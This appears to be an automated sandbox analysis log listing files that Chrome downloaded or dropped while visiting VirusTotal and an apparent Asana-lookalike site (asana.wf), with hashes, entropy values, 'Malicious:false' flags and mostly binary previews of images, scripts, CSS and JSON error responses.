                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    Preview:RIFF.;..WEBPVP8 .;..pY...*0.u.>.@.K..".!..a...gn.7.u|J.|.w...b.*k>Y.....u.AW..v'..]....................4<g...P.._.b<'...1...{.c....-..R<..TrW..['.G;....e".....E..w...2*.".|U..........+W...N...pJ......R.B....i..Y.;2.l$..W...au.F..>..Sc..\sO-......K&..c0Hl.aI.*..]....\....y1j<.w.4..|...*..:..).\..XP...|....#.u...t.'.dF.F..f.$.yM.#p.X......r.-}..S.4.1.#...[..p.]L.V..j. ..@.aA9.0z .7..A.@b..D.}.|........I.....G.Ag_=.*lk.......L6.;i..p..O.u..MTEE.10..M+4".r}.........k=.}..........1.......[[....a.......v.\y..........sA....H.!........|...u?&..q....Z.:.a.$.....M."..YbLXp|E....RD...~...3.\......V....K./v.. .}+.tq.@..q....Q5. ^.|...x.d.z4..v.>.Y..1.........Us.4.!.....I......(p.......0{..zf......N,sr.J}^......f.....M"..3D...D.(..../..T...1f...j....T-.mY..:..<c.3.....I68niA..Il5.k..(I@.....)..w.T........T..x...(...8}...z7...!....|.....p......D...O.............m..}^..A....O.da.'.y".._.........W.....y.c.5t..P.4E..l....,(r..h.h...t...|..#.......Dj.x....
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):3854
                                                                                                                                                                                                                    Entropy (8bit):7.6425967221194755
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:96:zYoFqeVgDoLShRCBbF5yQD/O6gfkj82yzd:FWDouhRC1LyQD/O6MkQfp
                                                                                                                                                                                                                    MD5:A55C241653F1FE6560D12B9B3C885243
                                                                                                                                                                                                                    SHA1:D1390E7CA2818CA367379A7701D071A5CB6076B2
                                                                                                                                                                                                                    SHA-256:20375334A44EDD41F7F8CC6FC7679F977CDA5F0A61C346D27726622C8415AA39
                                                                                                                                                                                                                    SHA-512:35BDF658FA79F019F7CC020DD835F66DBA778624F4E0CB86973CF2C827282AFBD4C38CBF7A30705FE59B155CA430ED2A4C7CA8F57FF3B33C94E2BBF640364B77
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    Preview:RIFF....WEBPVP8X......../.....ALPH.....g`.m......>""..:.j.m....H..v....f..T.`.e.......tG....mn.d....'b..`.x.c.E...Y!s......qV...%..WOL*$S..]QytE..+..].......?............?............?............?............?............?............?....]q...W...b...=....W...y...]R.r.YA.#.....pV.h..mj.a....7...nVj...VP8 ....P....*0. .>.H.L%..""......gn.u.............%~3...._.......B..{3.^2#..O9).r....i...k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k.|w.~%...W%V....L..l.S"...^Z......8...}...k..c..Bl.1...A...A.aV......6..).JD1..bY.h..8.....H.D..3/.Se....A$..@I..q.+.@L)...n...pW..."...y..k. ..r.G...9A....?.X.<l;.e....V.x.....?..k.I.&..Y.....I.<J.$...<.}5..}5.-....y.....&MDo...0D.{}.k...{m..T..p..E..._..._...W....*.z..a..Sccz...
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):226
                                                                                                                                                                                                                    Entropy (8bit):4.8823160201781715
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:6:3RsJwouzsY6A++sdLA23MA7DQ6bIrSQnDIQCfym2UnMGAn:K+F2AwrDDerSnQCuyMGA
                                                                                                                                                                                                                    MD5:BA8EABFF1D49E77819B4766496B8AA09
                                                                                                                                                                                                                    SHA1:C4F9EE8E9CDAC75CA5F3F1A6B8C41D9D60C29553
                                                                                                                                                                                                                    SHA-256:C556797AFDACF97C5C41BDF782502B669B478B8D3C98A838B4DE81DE63864E7E
                                                                                                                                                                                                                    SHA-512:420BB281C09B456CEA22351212984315E8744C9935466AE279534FEB1DD5D5C9D45980A4CE6E6E8D94FF82162DDA93D39171E0729A468095D492D8AC327416D5
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/execution_parents
                                                                                                                                                                                                                    Preview:{. "data": [],. "meta": {. "count": 0. },. "links": {. "self": "https://www.virustotal.com/ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/execution_parents?limit=10". }.}
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:PNG image data, 192 x 192, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):8764
                                                                                                                                                                                                                    Entropy (8bit):7.944825415489751
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:192:8MWksO8NCl+7A2ZIWbvlXw/e0e/iq0ERi/pKFVG+tfGBZzLdnmmv:PWksTNtA2hbdkw8/pKFU+t+BR5nmmv
                                                                                                                                                                                                                    MD5:D834C97492CF87524B1FFA201AE05BBB
                                                                                                                                                                                                                    SHA1:0915C22AC8353C9423DCFCC61E7071D49F4C0C08
                                                                                                                                                                                                                    SHA-256:1614E807C8DF7665D0BDF4BF47099C45A94FC27EC69B9DE53C081B7A92929D65
                                                                                                                                                                                                                    SHA-512:95CE816D69CCEC15AC381B23D8DDB0891A2DC9F6943DC66CA75038733A26932706DD8206A00CEBCA8CB8B2956124B146A2F8DF44918A5DF584E1B623B85075BA
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/gui/images/manifest/icon-192x192.png
                                                                                                                                                                                                                    Preview:.PNG........IHDR.............R.l...".IDATx..]...u.......w....H..c.........U.I.M.r.....!+!..)....!.lH.....m.`c...`./iW....}........>..w.j{..n..s...<~..mmmmA[|...6.1i.A.........%;..n3....=G...4.W..G=.......&...@..2..3..f.o...@....].V..L...@.....M.4.... .....(.4M.Z*Y.........6K~.x'.F.U.K....NWylm..c...6S........U.Kmp...W.&t.f;..f&...........j..".....r..32.8e!.b.BFR..mE....0......o.3.T.1&.D..._..c...`..f.....e...i;..Q........!ds.w.:u*.i......?Fvl.......~.9&.....9.;.D.`..f.h..?..fM.......0[.?T....^......~......c. ..LU...i....k..........Z.c.}.7.)....X./Cv...nm..&.6.#]a{..3I9.........fvCF...... ....+@~....@0............L.*%.N.*..w...5Q.$.j:b.C.4E.gO.w.0st#*hO<..].y.*;.dD.).f.t=*7K...iC.....a...XJ......}..da...c..&.D.(r..CgW....oY.<.[....;Xh..23.v.)..C. ...5..v.....h.....8......V.ovW/...g...Q w..$....._..cl.S...Fr..M....@.....I.m.T.|....fa.b..T.Gg$.tf....=..)..<@....U.$.3.oT...|...}.L.@e..P'..qc...I.7.....U....l...C./....|....7.GB
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):181
                                                                                                                                                                                                                    Entropy (8bit):4.328146837827697
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:TDFFF0KBojEV5hPKZHFFFizXO8HOAWRRkPFzA5KiAFVTCWI1A5HFNhBUliAn:TD/uaoBZAbO8HvWRRe3ePilNXUwAn
                                                                                                                                                                                                                    MD5:478EBD50127DA8FF67F45FF32B1FADC9
                                                                                                                                                                                                                    SHA1:1AD153784C05C6BE30B95D8835CEDD9D5183FFA8
                                                                                                                                                                                                                    SHA-256:EE402D01A943841EAFC309DF31EA958A981844B5C7A4A833164A22036B624C42
                                                                                                                                                                                                                    SHA-512:B1EA3400186FCFE43A9DFFCA955A13A0E5DF6C0A77EAE47129447F1FB9110B618B786969ABADF975D3AE36A3CB4B19F1CD1483232F3024F3BA5B10BC902D1018
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    Preview:{. "error": {. "code": "RecaptchaRequiredError",. "message": "Please re-send request with a valid reCAPTCHA response in the \"x-recaptcha-response\" header". }.}
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):1561
                                                                                                                                                                                                                    Entropy (8bit):4.809746397407399
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:48:S/ogq9pFrd75MHdFGJnxF6OxMf8n40Rzy:S/XKFrDigF6Y540Rzy
                                                                                                                                                                                                                    MD5:2AD9E2CC492A738E2FA0240AC56D1EEC
                                                                                                                                                                                                                    SHA1:EAE9B5837EBEC422AB1615382C4488184B8E3367
                                                                                                                                                                                                                    SHA-256:C3AE4AFECD63A668F69EF6AF2A19C08B08D73F8755E790EA004A080EEE542157
                                                                                                                                                                                                                    SHA-512:AFCC7805FD1C28D0C17982D9E3C8285B7D643D47D304198FE48539F4214C1162F760FC0A921A5915ACF7C53C32495153568566245ADE2DE8C09CF858189D7FE8
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://asana.wf/css/style.css
                                                                                                                                                                                                                    Preview:.centered-link {.. position: absolute;.. display: flex;.. align-items: center;.. justify-content: center;.. font-size: 22px;.. z-index: 1111;.. width: 100%;.. height: 100%;.. font-weight: 700;.. text-align: center;.. text-transform: uppercase;..}...pop-up {.. position: fixed;.. background-color: rgba(0,0,0,0.8);.. width: 100%;.. height: 100%;.. display: flex;.. justify-content: center;.. align-items: center;.. z-index: 10000;..}...pop-up__wrapper h2,...centered-link-popUp {.. display: flex;.. align-items: center;.. justify-content: center;.. gap: 20px;.. margin-bottom: 0;.. font-size: 48px;..}...pop-up__wrapper span {.. font-weight: 700;..}...pop-up__wrapper p {.. font-weight: 400;.. margin-bottom: 40px;..}...pop-up__wrapper {.. position: fixed;.. font-family: inherit;.. top: 20%;.. max-width: 800px;.. /* transform: translate(-50%, -50%); */.. background-color: #fff;.. padding: 40px 50px 70px 50px;..
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:gzip compressed data, max compression, original size modulo 2^32 221
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):200
                                                                                                                                                                                                                    Entropy (8bit):6.841014064623295
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:6:XtqDe7vzqnoDf20BZm/6EIlKTOUgo+F8Rl:XSA2gs/6EIlCLo8Rl
                                                                                                                                                                                                                    MD5:751911295BFFBFE07B94E21C19D23E50
                                                                                                                                                                                                                    SHA1:CB4BBFB5C73B6A38FDC2DE7E55D32AD984D0106A
                                                                                                                                                                                                                    SHA-256:413AC989E713AF6DF5BF755FF4063A782E139E0C8B666836508DCD4C03370EA1
                                                                                                                                                                                                                    SHA-512:92F3AF4802BB5F6F208A7F8B68E3BE742231C68CC5DF207D3B6BC0CFC335DF202CEE4C04AE11C74B10ECBCF5B7AAB43C7251DC5E0713F85C30D986DCEACB5CC6
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/gui/images/favicon.svg
                                                                                                                                                                                                                    Preview:..........L.;..0..w~..u..TPj(.....VJR..J...b..N...G..[...Vafz.k.....{7<.Z...!...l|.\...Q..3.8....dDPJ...j.z...9....Z_....B3.a..A+<...R@..".....5....,.E..n[0Y..(.$.H.+.}.`].u.N..[.|.........k?....
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:gzip compressed data, max compression, original size modulo 2^32 32214
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):9251
                                                                                                                                                                                                                    Entropy (8bit):7.977482857293516
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:192:IKm4+rqpLEsBbnd0LMkyYcc0+MV+CRTDCdxBHQAmR9ZUth:yUtpOor7t+MV+CRT6xBHQAmR9e/
                                                                                                                                                                                                                    MD5:45DC776A601740D37EE16EEBE3B411BD
                                                                                                                                                                                                                    SHA1:179B80990402B9FEFA1B2A5BB419E0D2054BBD79
                                                                                                                                                                                                                    SHA-256:8F3DD36E849A919E41DF0B5A89109E466BD99B440AEF9751E5CA7F6BA235C6D0
                                                                                                                                                                                                                    SHA-512:A2B7F4F64E298532C87550FF1C224137EFA38E331EA401BBAC9547EC27A2D5055F9B36CEFECD4D18EF53F6EAF9DEC53C91C4FCF5EE9E0F6C3645AC7FFE4198A7
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/gui/76885.abe51894b146687778f7.js
                                                                                                                                                                                                                    Preview:...........]{s.F...>...(D.@$%.A.....6U.M*..jO..Ar("&........z.....e..]]])JY.<zzzzz.5..:SN...$o..Z.[5^..O.....M.a.}X.Q<.L........}yyzrv....GG.W.......sOy.;z.I...\/..m.m.x.r...8....|.1..i..6.g.;..,w.Q.>;.....m..5)...c..M..v......E.r~~..^...~.......$.....%w..|..)n..&...H..>.2..e.4..|yx.Z...7....b4./.....fQ...g..~.....~9N....%.."L<....!.l.|i....@..<...>."/.B/.]^y...7.=......MF.t...p. \.X..^g4..9T.<.MM.v.>....d. .B-...$m.....v6J.H. .$V..A;.U..p.....B......K`:...dN..Z.P>/0y.s....a.2..1...H....!a....`0........BV#...X....L._Z...u...Ka*.X....2..*M...y.Vw4...E4Q.3....7..Q.E.4......SKG.. .......p..<<..\.4..\7K.%H....^..*.3.r.......'7....{.p.s..."\....@~...*.57.y.[.r7L.X.:.0..i.vh..c.....Z.r'O.)....r.$.5.....?.x....?.N.NUJ..!.G.Ow.iO9.f..Y.....rBgkC.]g..y2.Zn.v...d.6zs.....\..xU.......k..F4?..X........f...(.?Ca.....l.3".-/.m.M8...H^8J..]....Qv.....U..m.K..T...Ae.4Z.? .Rw...fz`y.5.U..v..A..U.L.$..Pn8..eQ....4..$..../F.a..n...2."..6."j.. yA..../...-..n,+Q.p....
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):276702
                                                                                                                                                                                                                    Entropy (8bit):7.997571545231762
                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                    SSDEEP:6144:MUdV5FSBRRdYIzG8eyIcVh6ktwwtpm7/VAX4xJKt:/dLoRKIzG8qK6kaf7/VA+Kt
                                                                                                                                                                                                                    MD5:36FF18DC33B06657070E61D62AAB80F7
                                                                                                                                                                                                                    SHA1:782CC466A33C2F6F8FE0FF4D502D72438084315F
                                                                                                                                                                                                                    SHA-256:FA2343363FB45823C7BE41AC18A3BD6E2BF48D2EB9DD26C737EFE3157089D2B5
                                                                                                                                                                                                                    SHA-512:99089799A420445B7320F881B7AB44BE1FFB35235D42FE0B7F54C1317E010D0261DFA4678D1B3E8EE58E3A24F8B8E7A99ADA5EB85EDD26654D48E03C2C43A50F
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    Preview:RIFF.8..WEBPVP8X...........*..ALPHD(....7n.I.,.w.......&. ......-....[..K...?.I.d....J..=.Z|..Q..(C...P..#....28..QJ..m....v.nX.-y..2Jb.F....?.e8xF...N...hX......j..J.T..J.!....<.Im.*.t.z...$I.$+c.3.#.;..W..]..!2k..a..P.$.v.......o...>....e.V..Ot..P...V........X....)......%.:...>.y^...........m..m.b.@.2P...&${.5..'.U...&ffV...'C...9...l..Z.}.9...y$"|1.dI.l[...2.UM.n..U.X{...8.....?....n..B.{D,N..|.X8..F7}.....N.,..O...<08-|R...|......<k.$.B#O.....s....*.b.....[......s g.B.Wp8..2....@.,...g.zD..(.$W{.......xz..|....K#O...y.i..'p.#.1...-...E..dO.vy.Ic...z:..;7....k.........~.....I..x.1......z-....&.4./...Qd..%y./.....>'..C.....<.>H..f.O.sy......]..,N.......m.].)..qi[.`Vx.c[Y.%.dB...O.S..k...o....<D5..g.!..!.<.*.D.S...4%..ga..8Z'.AP...a........d...v...".ny.J....U..>..g.2..bJ...<....=....] .<......^.........?.=_...<.w.~..~....CX...6q....'.0.&...[.*..1._.....).......2s....r..X..<..X..q.x.n..<krg.T........C1..?..Z...n{.x O.;.'....E.C..
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):181
                                                                                                                                                                                                                    Entropy (8bit):4.328146837827697
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:TDFFF0KBojEV5hPKZHFFFizXO8HOAWRRkPFzA5KiAFVTCWI1A5HFNhBUliAn:TD/uaoBZAbO8HvWRRe3ePilNXUwAn
                                                                                                                                                                                                                    MD5:478EBD50127DA8FF67F45FF32B1FADC9
                                                                                                                                                                                                                    SHA1:1AD153784C05C6BE30B95D8835CEDD9D5183FFA8
                                                                                                                                                                                                                    SHA-256:EE402D01A943841EAFC309DF31EA958A981844B5C7A4A833164A22036B624C42
                                                                                                                                                                                                                    SHA-512:B1EA3400186FCFE43A9DFFCA955A13A0E5DF6C0A77EAE47129447F1FB9110B618B786969ABADF975D3AE36A3CB4B19F1CD1483232F3024F3BA5B10BC902D1018
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    Preview:{. "error": {. "code": "RecaptchaRequiredError",. "message": "Please re-send request with a valid reCAPTCHA response in the \"x-recaptcha-response\" header". }.}
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:HTML document, ASCII text
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):178
                                                                                                                                                                                                                    Entropy (8bit):5.052424732227886
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:PIy796FD0k+zrrIJZNQEXRnBeBvETbjSraDiSABFESwzRx3DW:B8FQk+HrIjuEX8EurzEPzRx3y
                                                                                                                                                                                                                    MD5:82A25870711ACAA9FE373F2252F79475
                                                                                                                                                                                                                    SHA1:01B1DF0CE8E76F49129F112BE3FB0CDFEF696818
                                                                                                                                                                                                                    SHA-256:1AD3E4394B5F2363B8F1B0525D221A8E1481919232068010921794C541CEF10E
                                                                                                                                                                                                                    SHA-512:F25FBB843B0DABE41FDA7D72CBA16E5AD07684D9F39F037907DDFEE7639CBE5F48C1B52F17258382A7D7B0D657BCDB518B5BF20281ADD141115808C63080A7E9
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    Preview:<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">.<title>405 Method Not Allowed</title>.<h1>Method Not Allowed</h1>.<p>The method is not allowed for the requested URL.</p>.
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:gzip compressed data, max compression, original size modulo 2^32 104206
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):31330
                                                                                                                                                                                                                    Entropy (8bit):7.992612745668913
                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                    SSDEEP:768:S1jopoCGmOnyghXS676BwmdewBHBf1hQfwB133v:CoKCGmOXtpewmr/bBBv
                                                                                                                                                                                                                    MD5:76A42717E1234B60608EE677BCA59BD9
                                                                                                                                                                                                                    SHA1:03802A9EBB8DFAF733B9E782BF3B9D6EF8004493
                                                                                                                                                                                                                    SHA-256:EAED8B03EE347A3104966F2ED1CAD0722DFB6FA607812C9ECD75ACCD8A50E016
                                                                                                                                                                                                                    SHA-512:0F64AC241953CB64093F7FFC07EFC8A8DE2E9CF9F8F39D18C2CD7C4F9FE4830736E0C17A79197EE59501CB0C3397EDD9785140D4D03BC734D959ABA3F9415B91
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/gui/65127.d20da69ed29d077cb338.js
                                                                                                                                                                                                                    Preview:...........{..V.6...)...SA.g..7u.....ng..y.....A......}XKKB`.M..~...bii..u...E.zi6..Y...Q.2......"~...-..i..5.>~|..-.q............7.v7..w.....mom.u...Q...:j...=......qp.....7:..v.......~..gg....c~..g.~.n....~.w6....?.......@M.....I.y....z....".dQ.{c.....?...u6...I$....m=....E0Y.7. .....<....H.....M..&qx..'..y2..5..drA.Z.8....qc..9.........q..Q/../.a...:`.^z.}.n.....y/k.....{.5.E.4.>.U.~....CV.1q..,.......u^i.q.h....\..f.d...|.I..gc.....a...I..K...../. k......+.....I....,K.<.nz.....z..j.&#.u8.....kf.K.Z.p..,l.=mn...........q.t....Q.}.4..z.(H.6...:.".Dt............q............(..*.;?.a..... M=.H...z...[..t..it...>Dq....G..IH..h\..2./..U8.t...7|...8H.a.{.V...W...{..'.^>.~..g/Nz..<.5...,....W...68......4..h.....&a.x....."N.Qxtr..Z?7n..e<I....L.;;P..g..-..$.&.9.O@..}.....q.q3....q..t./>~./z.w......C..0..k...q..T6..y.d.L....U.}y..y..4.X.__K7Ml.(.O..#..x...].7.&...^.a.....{8......q...f..I....SS..........34..g8.f....7...p.L..^.g|a..y.(...
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):2012
                                                                                                                                                                                                                    Entropy (8bit):7.853780472010002
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:48:GiQQmcYIG8Ra+7W9EwnxDOsaYrpfm4dLpE2h/XE+23Z/s:GiNxY3q7twxDCafzLHv2C
                                                                                                                                                                                                                    MD5:B4D544D181177A03CCA806584730D0AD
                                                                                                                                                                                                                    SHA1:21958883BEF840C5F096DC760E943CB39CC3F975
                                                                                                                                                                                                                    SHA-256:2CF12A7ADEECD24C1A110FBD89942471E7C89A8750D8FC236D48A14A79B27550
                                                                                                                                                                                                                    SHA-512:E130338C50BAB970A2EB116BE7FA05F37D5106D9FEAA3F39C6BB7E3ABFA0DEBA8A8EE48F44A18765907C853E90580FF1566E1903CBD49778B17F8B2B0A47ED30
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://asana.wf/img/logo-ratio-40pxheight-merck.webp
                                                                                                                                                                                                                    Preview:RIFF....WEBPVP8X........+..O..ALPH..........9...M.6...1g.}V.m.f.f.6.J.Ejw....3......<.1....6....q....m.H.m.E..Fw.".#.S.*7o...S.z.....R.f.H..)D.b..Q..<.......Gy.......dxM.Ta.):1M.d|R.0.\X)E....)./...".`xJ......D.J....F. .].8Bg[..E..y....}f...3n:...Q..R[.wI.g...".......0#HqR......A:g.XCQw..fk.....Ge.!v.J.-.N....6.`...k..:j/...."|....j......!$i..|.h.k.yJu..*nT.;.4...N.W..Qs.)...\F%.[Q^C./.h..1.d.q$..I..T'...|..t...1..I.o;..4.<......C...j4.".n.-.U.PY5j.Qw..$.s}+Hu.7..E..7..j&.L.x... .^......CT..`.g%.;..M$/...d:'..s..;.ER^OQ..dh0E].X.i..`..^...I..P=#...J.#).u..:3..H.Y..&..s..[.7..5..._...-..#1...aS#.S..1G..K...[..%....5+.D.W...D.}\..`..YPZ5....cn3p%.C.R....H.KI.9...-?.X.....r.........0U' ..$.t=.JuM'...@.WH|..vnH,....@.g.....u.d.&...u.N.|...>G}.....Z^9^..Q...~.&9......lJ.._....O..1!$/....z.jh^D.N.SR..B.!A.>.``S%1{/............iU.y.w...$....}.S...K.>.h.....Ts.^...2..9.#.].!X..3.^..38...m=...k.tl...,n.$>..qe..k..\i.i..ps..).~(L..&.S.C..g...n..9...B..
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):7486
                                                                                                                                                                                                                    Entropy (8bit):7.956209252485213
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:192:Qx9NmCns2IwXtTBbPEBAZLAYTEpWIcNM5:QcC9TlPQAZLzQWIgq
                                                                                                                                                                                                                    MD5:6FE6B4545ADFAD659ECFA1DB1428CB64
                                                                                                                                                                                                                    SHA1:3EE1BB924C803E993FD7C5275328F031E73A8D51
                                                                                                                                                                                                                    SHA-256:154FE8571E314E242A5829BEF2C2CFEF5E22EF71A1524E86EAECA0DB24EA878D
                                                                                                                                                                                                                    SHA-512:05A0E6B3C51AF7FF9F4130FF5D2384A6F4B842DC84281147481B2D8CE90F6F4A8E35AD7BFA085357514C1F364B8F6A07FB3540059855FAAC676CDEF58E6DB3F5
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    Preview:RIFF6...WEBPVP8X......../.....ALPH.....g`.m......>""..:.j.m....H..v....f..T.`.e.......tG....mn.d....'b..`.x.c.E...Y!s......qV...%..WOL*$S..]QytE..+..].......?............?............?............?............?............?............?....]q...W...b...=....W...y...]R.r.YA.#.....pV.h..mj.a....7...nVj...VP8 .........*0. .>.H.L%.&.!2.....in.v..8.7Z<v.........=..z.......u.....YZ..../.?..M.O...4?.|..3.+........O.....~..o..........7...w..~..zZ.d".-~@UE.2.X.. *....._..Qv.V......fB+....T].!..k..........U.l.E`Z.....d".-~@UE.2.X.. *....._..Qv.V......fB+....T].!..k..........U.l.E`Z.....d".-~@UE.2.X.. *....._..Qv.V......fB+....T]..+.CG...J..!..Py.r...9j#5..U.l.E`Z......y.....kTD...o....%.fB+....T].!......3[...}o....L.&.h..F..gGL...U.^_./.%+..2Y./F.L...*.wo!....Pq:..].!..k.......}.t....vO.V_9..,+,.S.:...Q..#bK0...V~.6s..+.Jg..c........9.Mk.)Z...M0h...3....`Z.....d".,....M..{....:.R...u.)..F..).'..Rk...%L.`............U.l.E`C..i..b..?4N\.6S.QE..........2....
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):181
                                                                                                                                                                                                                    Entropy (8bit):4.328146837827697
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:TDFFF0KBojEV5hPKZHFFFizXO8HOAWRRkPFzA5KiAFVTCWI1A5HFNhBUliAn:TD/uaoBZAbO8HvWRRe3ePilNXUwAn
                                                                                                                                                                                                                    MD5:478EBD50127DA8FF67F45FF32B1FADC9
                                                                                                                                                                                                                    SHA1:1AD153784C05C6BE30B95D8835CEDD9D5183FFA8
                                                                                                                                                                                                                    SHA-256:EE402D01A943841EAFC309DF31EA958A981844B5C7A4A833164A22036B624C42
                                                                                                                                                                                                                    SHA-512:B1EA3400186FCFE43A9DFFCA955A13A0E5DF6C0A77EAE47129447F1FB9110B618B786969ABADF975D3AE36A3CB4B19F1CD1483232F3024F3BA5B10BC902D1018
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    Preview:{. "error": {. "code": "RecaptchaRequiredError",. "message": "Please re-send request with a valid reCAPTCHA response in the \"x-recaptcha-response\" header". }.}
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):181
                                                                                                                                                                                                                    Entropy (8bit):4.328146837827697
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:TDFFF0KBojEV5hPKZHFFFizXO8HOAWRRkPFzA5KiAFVTCWI1A5HFNhBUliAn:TD/uaoBZAbO8HvWRRe3ePilNXUwAn
                                                                                                                                                                                                                    MD5:478EBD50127DA8FF67F45FF32B1FADC9
                                                                                                                                                                                                                    SHA1:1AD153784C05C6BE30B95D8835CEDD9D5183FFA8
                                                                                                                                                                                                                    SHA-256:EE402D01A943841EAFC309DF31EA958A981844B5C7A4A833164A22036B624C42
